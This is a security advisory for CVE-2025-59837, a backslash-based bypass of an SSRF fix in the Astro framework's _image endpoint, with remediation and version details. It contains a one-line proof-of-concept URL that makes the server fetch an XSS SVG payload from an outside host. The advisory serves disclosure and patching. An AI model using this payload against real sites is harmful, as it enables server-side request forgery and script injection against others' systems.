CVE-2025-59837

Description

### Summary This is a patch bypass of CVE-2025-58179 in commit [9ecf359](https://github.com/withastro/astro/commit/9ecf3598e2b29dd74614328fde3047ea90e67252). The fix blocks `http://`, `https://` and `//`, but can be bypassed using backslashes (`\`) - the endpoint still issues a server-side fetch. ### PoC [https://astro.build/_image?href=\\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg](https://astro.build/_image?href=%5C%5Craw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg)

How to fix CVE-2025-59837

To remediate CVE-2025-59837, upgrade the affected package to a fixed version below.

• —upgrade to 5.13.10 or later

Is CVE-2025-59837 being exploited?

Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• >= 5.13.4, < 5.13.10

CVSS scores

References (5)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2025-59837
• PATCHgithub.com/withastro/astro
• WEBgithub.com/withastro/astro/commit/1e2499e8ea83ebfa233a18a7499e1ccf169e56f4
• WEBgithub.com/withastro/astro/commit/9ecf3598e2b29dd74614328fde3047ea90e67252